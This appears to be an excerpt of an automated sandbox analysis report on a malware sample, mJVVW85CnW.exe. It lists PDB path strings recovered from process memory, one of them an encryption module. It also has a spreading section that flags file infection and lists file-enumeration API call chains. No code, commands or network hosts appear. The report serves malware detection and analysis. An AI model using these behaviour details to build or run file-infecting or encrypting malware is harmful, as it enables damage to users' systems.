Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\es\ source: mJVVW85CnW.exe, 00000004.00000003.2248186822.00000000033CD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\es\+w source: mJVVW85CnW.exe, 00000004.00000003.2303995266.00000000033E4000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2297247654.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2305579643.00000000033E4000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2297502221.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2302675835.00000000033DD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: sers\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.bgzq source: mJVVW85CnW.exe, 00000004.00000003.2179601467.0000000003163000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\z source: mJVVW85CnW.exe, 00000004.00000003.2218218924.0000000009AEE000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2159934346.0000000009ABC000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2209724669.0000000009AD8000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218625709.0000000009AEF000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2194946115.0000000009AD7000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2178264435.0000000009AD0000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218149624.0000000009AE1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\* source: mJVVW85CnW.exe, 00000004.00000003.2194490459.0000000009B86000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2194864281.0000000009BC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \user\Local Settings\Temp\Symbols\winload_prod.pdb\ source: mJVVW85CnW.exe, 00000004.00000003.2163571007.000000000313E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mJVVW85CnW.exe, 00000004.00000003.1793167082.00000000097E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\croso source: mJVVW85CnW.exe, 00000004.00000003.1962602904.0000000009B8E000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1993610047.0000000009B8E000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1994690551.0000000009B8E000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2159817615.0000000009B8B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1961441195.0000000009B8E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: mJVVW85CnW.exe, 00000000.00000002.1692488180.0000000005E30000.00000040.00001000.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000001.00000002.1709912189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000003.00000002.1714943939.0000000005DF0000.00000040.00001000.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000002.2332971120.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000005.00000002.1724733752.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000006.00000002.4155355080.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: mJVVW85CnW.exe, 00000004.00000003.2248978590.0000000009B3C000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2284810160.0000000003434000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2288349564.000000000343D000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2260388125.0000000003404000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2261840679.000000000342D000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2257701798.0000000003404000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2248186822.000000000343C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mi_exe_stub.pdb source: mJVVW85CnW.exe, 00000004.00000003.1807785358.00000000097E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: mJVVW85CnW.exe, 00000004.00000003.2217775658.0000000009B3C000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2209387473.0000000009B3C000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2195142562.0000000009B4D000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2194490459.0000000009B2A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\RecoveryImproved\.pdb\ source: mJVVW85CnW.exe, 00000004.00000003.2328178166.0000000003563000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2311276415.0000000003500000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2312159139.0000000003510000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2316780959.0000000003553000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2312434569.0000000003513000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2325305724.0000000003553000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\r\ source: mJVVW85CnW.exe, 00000004.00000003.2217775658.0000000009B3C000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2209387473.0000000009B3C000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2195142562.0000000009B4D000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2194490459.0000000009B2A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\e\ source: mJVVW85CnW.exe, 00000004.00000003.2286518478.0000000009AE8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ce\t[ source: mJVVW85CnW.exe, 00000004.00000003.2240212942.0000000009B7E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\G source: mJVVW85CnW.exe, 00000004.00000003.2218899764.0000000009C30000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2159183055.0000000009BFD000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2159696700.0000000009BFD000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218852977.0000000009C0E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ta\ source: mJVVW85CnW.exe, 00000004.00000003.2311578566.00000000033F1000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2323070329.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2329007033.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2303995266.00000000033E4000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2320258287.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2325524152.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2305579643.00000000033E4000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2319564845.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2302675835.00000000033DD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: mJVVW85CnW.exe, 00000004.00000003.2311276415.0000000003500000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2312159139.0000000003510000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2312434569.0000000003513000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2301768929.0000000003567000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\a source: mJVVW85CnW.exe, 00000004.00000003.1962602904.0000000009B8E000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1993610047.0000000009B8E000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1994690551.0000000009B8E000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2159817615.0000000009B8B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1961441195.0000000009B8E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: mJVVW85CnW.exe, 00000004.00000003.2248151544.0000000009BBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\G source: mJVVW85CnW.exe, 00000004.00000003.2248884662.00000000030ED000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2249712503.0000000003105000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\ source: mJVVW85CnW.exe, 00000004.00000003.2260388125.0000000003404000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2261840679.000000000342D000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2257701798.0000000003404000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2248186822.0000000003417000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: mJVVW85CnW.exe, 00000004.00000003.2248186822.00000000033CD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\ source: mJVVW85CnW.exe, 00000004.00000003.2163571007.000000000313E000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2194309118.000000000313E000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2209279499.000000000313E000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2217637925.000000000313E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\UZU source: mJVVW85CnW.exe, 00000004.00000003.2240145032.0000000009C58000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2248020922.0000000009C58000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2194776671.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2256526995.0000000009C58000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2209611098.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2217990497.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2284432496.0000000009C67000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218319196.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218932812.0000000009C6C000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2285437225.0000000009C78000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\f source: mJVVW85CnW.exe, 00000004.00000003.2296903008.0000000003480000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2295116963.000000000346F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\J source: mJVVW85CnW.exe, 00000004.00000003.2218899764.0000000009C30000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218852977.0000000009C0E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: mJVVW85CnW.exe, 00000004.00000003.2284810160.0000000003434000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2288349564.000000000343D000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2260388125.0000000003404000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2261840679.000000000342D000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2257701798.0000000003404000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\bat\(= source: mJVVW85CnW.exe, 00000004.00000003.2194309118.000000000313E000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2209279499.000000000313E000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2217637925.000000000313E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\a\C source: mJVVW85CnW.exe, 00000004.00000003.2294528005.0000000009B49000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\AC\INetCookies\bbwe\AppData\pData\ad_prod.pdb\we\G source: mJVVW85CnW.exe, 00000004.00000003.2258660685.0000000009BD3000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2249931581.0000000009BDA000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2257225377.0000000009B7E000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2248108132.0000000009BCF000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2262766102.0000000009BE0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\vegumizisagezo_curip\liy dapehu.pdb source: mJVVW85CnW.exe, 00000000.00000002.1690106182.0000000000411000.00000002.00000001.01000000.00000003.sdmp, mJVVW85CnW.exe, 00000000.00000000.1684432543.0000000000411000.00000002.00000001.01000000.00000003.sdmp, mJVVW85CnW.exe, 00000001.00000000.1687803475.0000000000411000.00000002.00000001.01000000.00000003.sdmp, mJVVW85CnW.exe, 00000003.00000002.1712093015.0000000000411000.00000002.00000001.01000000.00000003.sdmp, mJVVW85CnW.exe, 00000003.00000000.1706729183.0000000000411000.00000002.00000001.01000000.00000003.sdmp, mJVVW85CnW.exe, 00000004.00000003.1806553429.00000000097E0000.00000004.00001000.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000000.1709928301.0000000000411000.00000002.00000001.01000000.00000003.sdmp, mJVVW85CnW.exe, 00000005.00000000.1714586870.0000000000411000.00000002.00000001.01000000.00000007.sdmp, mJVVW85CnW.exe, 00000005.00000002.1720792166.0000000000411000.00000002.00000001.01000000.00000007.sdmp, mJVVW85CnW.exe, 00000006.00000000.1718039159.0000000000411000.00000002.00000001.01000000.00000007.sdmp, mJVVW85CnW.exe, 0000000A.00000000.1825354137.0000000000411000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.549981C3F5F10_8wekyb3d8bbwe\LocalState\ate\on Data\Temp\Symbols\ntkrnlmp.pdb\G source: mJVVW85CnW.exe, 00000004.00000003.2305119902.0000000009C11000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\s\ source: mJVVW85CnW.exe, 00000004.00000003.2284432496.0000000009BCF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\@ source: mJVVW85CnW.exe, 00000004.00000003.2218899764.0000000009C30000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218852977.0000000009C0E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ate\ source: mJVVW85CnW.exe, 00000004.00000003.2248186822.00000000033CD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\\Pb source: mJVVW85CnW.exe, 00000004.00000003.2179231504.0000000009B04000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1870379356.0000000009AF6000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2159934346.0000000009ABC000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2195101334.0000000009B00000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2178570411.0000000009AFE000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1941513401.0000000009ADF000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1948123921.0000000009AED000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2194946115.0000000009AF3000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218719984.0000000009B0D000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1941657951.0000000009AEA000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2178264435.0000000009AD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errore\AppCache133408904996229952.txtx\7P source: mJVVW85CnW.exe, 00000004.00000003.2179601467.0000000003163000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ta\% source: mJVVW85CnW.exe, 00000004.00000003.2304503353.000000000346F000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2303727711.000000000346C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Diagnostics\EXCEL\d.pdb\ source: mJVVW85CnW.exe, 00000004.00000003.2317539740.0000000003453000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\bbwe\*y\B source: mJVVW85CnW.exe, 00000004.00000003.2325083218.0000000003199000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: mJVVW85CnW.exe, 00000004.00000003.2329913318.00000000034FB000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2331014211.00000000034FB000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2327797435.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2327666459.0000000009C3C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\[ source: mJVVW85CnW.exe, 00000004.00000003.2195101334.0000000009B00000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2194946115.0000000009AF3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: build2.exe, 00000008.00000002.2354559302.0000000020E38000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\< source: mJVVW85CnW.exe, 00000004.00000003.2218899764.0000000009C30000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218852977.0000000009C0E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\\^ source: mJVVW85CnW.exe, 00000004.00000003.2311578566.00000000033F1000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2323070329.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2329007033.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2303995266.00000000033E4000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2320258287.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2325524152.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2305579643.00000000033E4000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2319564845.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2302675835.00000000033DD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\} source: mJVVW85CnW.exe, 00000004.00000003.2262299076.000000000319D000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2260099754.000000000319C000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2258542128.0000000003194000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\Mx source: mJVVW85CnW.exe, 00000004.00000003.2218218924.0000000009AEE000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2159934346.0000000009ABC000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2209724669.0000000009AD8000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2194946115.0000000009AD7000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2178264435.0000000009AD0000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218149624.0000000009AE1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\*pw source: mJVVW85CnW.exe, 00000004.00000003.2257225377.0000000009B7E000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2258994911.0000000009B7E000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2259310801.0000000009BBB000.00000004.00000020.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\Desktop\mJVVW85CnW.exe

System file written: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.html

Jump to behavior

Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	1_2_00410160
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	1_2_0040F730
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 1_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,	1_2_0040FB98
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	4_2_0040F730
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_00410160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	4_2_00410160
Source: C:\Users\user\Desktop\mJVVW85CnW.exe	Code function: 4_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,	4_2_0040FB98

